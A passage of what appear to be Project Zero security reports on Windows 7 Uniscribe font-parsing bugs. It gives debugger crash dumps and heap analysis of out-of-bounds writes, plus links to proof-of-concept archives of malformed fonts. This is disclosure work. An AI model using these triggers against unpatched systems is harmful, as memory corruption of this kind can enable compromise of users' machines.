All of the issues reproduce successfully on Windows 7. It is highly encouraged to enable PageHeap for the test program in order to get reliable repros. It is also necessary to use a custom program which displays all of the font's glyphs at various point sizes, and additionally calls some of the Uniscribe-specific API functions.
Attached is an archive with textual crash excerpts and up to 3 samples for each unique crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41655.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1030
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!FillAlternatesList function, while trying to request a list of alternate glyphs for a specific glyph in a corrupted font file:
---
(4bfc.c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000d ebx=0021006f ecx=00000010 edx=00000018 esi=07b4bfe8 edi=0021f620
eip=75232fe1 esp=0021f550 ebp=0021f5b8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
USP10!FillAlternatesList+0x2d1:
75232fe1 66891c32 mov word ptr [edx+esi],bx ds:002b:07b4c000=????
0:000> kb
ChildEBP RetAddr Args to Child
0021f5b8 7522eb56 09312db6 00000000 00000003 USP10!FillAlternatesList+0x2d1
0021f5ec 75208b38 0021f640 0021f614 746c6161 USP10!GetOtlGlyphAlternates+0x86
0021f770 7520f214 0021f9d8 6e74616c 746c6664 USP10!OtlGetAlternateGlyphList+0x108
0021f7a0 00dc4557 30011a14 00000001 00000000 USP10!ScriptGetFontAlternateGlyphs+0xb4
[...]
---
In our test harness, we set the cMaxAlternates parameter of the ScriptGetFontAlternateGlyphs function to 10, indicating that this is the maximum number of values which can be written to the output pAlternateGlyphs array. However, the API function does not seem to respect the argument and attempts to write more data into the buffer -- in this case, 29 WORDs. The vulnerability can also be confirmed by looking at the output value of pcAlternates, which should never exceed 10 in this case, but is indeed set to 29. As a result, the bug may lead to corruption of various memory areas, including stack, heap, and static memory, depending on the type of pointer passed to the function by its caller.
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled and the output buffer allocated from the heap. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the vulnerable API function.
Attached is a proof of concept malformed font file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41654.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1029
We have encountered a number of crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file. While crashes in this specific family take various shapes and forms, they all occur in functions directly or indirectly called by USP10!BuildFSM. An example crash excerpt is shown below; note that in this excerpt the faulting instruction is a 16-bit store (mov word ptr [ebx+esi*4+2],ax) to 0x0964d07a, which lies past the end of the 0x1d8c-byte heap allocation at 0x0964b270 made via USP10!UspAllocCache -- i.e. an out-of-bounds heap write, not merely an invalid read:
---
(5020.4074): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000cc ebx=0964b270 ecx=0964c6aa edx=0038f409 esi=00000782 edi=0963d7d0
eip=751f968d esp=0038f3bc ebp=0038f468 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
USP10!BuildDynamicStatesStaticInputs+0x45d:
751f968d 668944b302 mov word ptr [ebx+esi*4+2],ax ds:002b:0964d07a=????
0:000> kb
ChildEBP RetAddr Args to Child
0038f468 751f7a33 00000048 09649700 0000001a USP10!BuildDynamicStatesStaticInputs+0x45d
0038f6a0 751f7076 095d3d88 095e1fa8 0038f6cc USP10!BuildFSM+0x193
0038f6b0 751fc5f4 c10125b4 095d3d88 095c6124 USP10!LoadArabicShapeTables+0x106
0038f6cc 751ea5a0 c10125b4 0963d7d0 0000001a USP10!ArabicLoadTbl+0xd4
0038f6f0 751ea692 095c6124 c10125b4 0000001a USP10!UpdateCache+0xb0
0038f704 751f152d c10125b4 095c6000 751f15db USP10!ScriptCheckCache+0x62
0038f710 751f15db 00000001 00000001 095c62e8 USP10!GetShapeFunction+0xd
0038f748 751f2b14 00000001 00000000 0038f7c8 USP10!RenderItemNoFallback+0x5b
0038f774 751f2da2 00000001 00000000 0038f7c8 USP10!RenderItemWithFallback+0x104
0038f798 751f4339 00000000 0038f7c8 095c6124 USP10!RenderItem+0x22
0038f7dc 751e7a04 000004a0 00000400 c10125b4 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0038f7f4 76ca5465 c10125b4 095c6040 0000000a USP10!ScriptStringAnalyse+0x284
0038f840 76ca5172 c10125b4 0038fc28 0000000a LPK!LpkStringAnalyse+0xe5
0038f93c 76ca1410 c10125b4 00000000 00000000 LPK!LpkCharsetDraw+0x332
0038f970 763c18b0 c10125b4 00000000 00000000 LPK!LpkDrawTextEx+0x40
0038f9b0 763c22bf c10125b4 00000040 00000000 USER32!DT_DrawStr+0x13c
0038f9fc 763c21f2 c10125b4 0038fc28 0038fc3c USER32!DT_GetLineBreak+0x78
0038faa8 763c14d4 c10125b4 00000000 0000000a USER32!DrawTextExWorker+0x255
0038facc 763c2475 c10125b4 0038fc28 ffffffff USER32!DrawTextExW+0x1e
0038fb00 01196a5c c10125b4 0038fc28 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a ebx
address 0964b270 found in
_DPH_HEAP_ROOT @ 95c1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
95c2ed4: 964b270 1d8c - 964b000 3000
5dbb8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
774e3431 ntdll!RtlAllocateHeap+0x0000023a
5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
751f6644 USP10!UspAllocCache+0x00000054
751f7975 USP10!BuildFSM+0x000000d5
751f7076 USP10!LoadArabicShapeTables+0x00000106
751fc5f4 USP10!ArabicLoadTbl+0x000000d4
751ea5a0 USP10!UpdateCache+0x000000b0
751ea692 USP10!ScriptCheckCache+0x00000062
751f152d USP10!GetShapeFunction+0x0000000d
751f2b14 USP10!RenderItemWithFallback+0x00000104
751f2da2 USP10!RenderItem+0x00000022
751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
751e7a04 USP10!ScriptStringAnalyse+0x00000284
76ca5465 LPK!LpkStringAnalyse+0x000000e5
76ca5172 LPK!LpkCharsetDraw+0x00000332
76ca1410 LPK!LpkDrawTextEx+0x00000040
763c18b0 USER32!DT_DrawStr+0x0000013c
763c22bf USER32!DT_GetLineBreak+0x00000078
763c21f2 USER32!DrawTextExWorker+0x00000255
763c14d4 USER32!DrawTextExW+0x0000001e
763c2475 USER32!DrawTextW+0x0000004d
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 2 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41653.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1028
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!UpdateGlyphFlags function, while trying to display text using a corrupted font file. In the excerpt below the faulting instruction is a read-modify-write (or word ptr [eax+edi+2],10h) at 0x09320002, just past the end of the 0x4000-byte heap allocation starting at 0x0931c000 made via USP10!UspAllocStatic -- an out-of-bounds heap write:
---
(5268.3b50): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003fe0 ebx=0000ffff ecx=000007fc edx=0050ee58 esi=0000f803 edi=0931c020
eip=75230c90 esp=0050eb48 ebp=0050eb50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
USP10!UpdateGlyphFlags+0x30:
75230c90 66834c380210 or word ptr [eax+edi+2],10h ds:002b:09320002=????
0:000> kb
ChildEBP RetAddr Args to Child
0050eb50 752336b3 42555347 0050ee58 00000000 USP10!UpdateGlyphFlags+0x30
0050ed2c 7522f29f 42555347 0050ee68 0050ee3c USP10!ApplyFeatures+0x553
0050ed78 7522b083 00000000 00000000 00000000 USP10!SubstituteOtlGlyphs+0x1bf
0050eda4 75226d5c 0050edd4 0050ee4c 0050ee68 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0050f010 7521548a 0050f11c 0050f148 0050f130 USP10!GenericEngineGetGlyphs+0xa1c
0050f0d0 7521253f 0050f11c 0050f148 0050f130 USP10!ShapingGetGlyphs+0x36a
0050f1bc 751e5c6f 7901150c 09316124 09316318 USP10!ShlShape+0x2ef
0050f200 751f167a 7901150c 09316124 09316318 USP10!ScriptShape+0x15f
0050f260 751f2b14 00000000 00000000 0050f2e0 USP10!RenderItemNoFallback+0xfa
0050f28c 751f2da2 00000000 00000000 0050f2e0 USP10!RenderItemWithFallback+0x104
0050f2b0 751f4339 00000000 0050f2e0 09316124 USP10!RenderItem+0x22
0050f2f4 751e7a04 000004a0 00000400 7901150c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0050f30c 76ca5465 7901150c 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0050f358 76ca5172 7901150c 0050f740 0000000a LPK!LpkStringAnalyse+0xe5
0050f454 76ca1410 7901150c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0050f488 763c18b0 7901150c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0050f4c8 763c22bf 7901150c 00000070 00000000 USER32!DT_DrawStr+0x13c
0050f514 763c21f2 7901150c 0050f740 0050f754 USER32!DT_GetLineBreak+0x78
0050f5c0 763c14d4 7901150c 00000000 0000000a USER32!DrawTextExWorker+0x255
0050f5e4 763c2475 7901150c 0050f740 ffffffff USER32!DrawTextExW+0x1e
0050f618 001a6a5c 7901150c 0050f740 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a eax+edi
address 09320000 found in
_DPH_HEAP_ROOT @ 9311000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
9311f38: 931c000 4000 - 931b000 6000
5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
774e3431 ntdll!RtlAllocateHeap+0x0000023a
5dbea792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
751f68fa USP10!UspAllocStatic+0x000000aa
751f6cea USP10!UspAcquireTempAlloc+0x0000002a
751e8778 USP10!ScriptRecordDigitSubstitution+0x00000028
76ca5304 LPK!ReadNLSScriptSettings+0x00000074
76ca53b8 LPK!LpkStringAnalyse+0x00000038
76ca5172 LPK!LpkCharsetDraw+0x00000332
76ca1410 LPK!LpkDrawTextEx+0x00000040
763c18b0 USER32!DT_DrawStr+0x0000013c
763c22bf USER32!DT_GetLineBreak+0x00000078
763c21f2 USER32!DrawTextExWorker+0x00000255
763c14d4 USER32!DrawTextExW+0x0000001e
763c2475 USER32!DrawTextW+0x0000004d
[...]
---
The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with 3 crashing samples.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41652.zip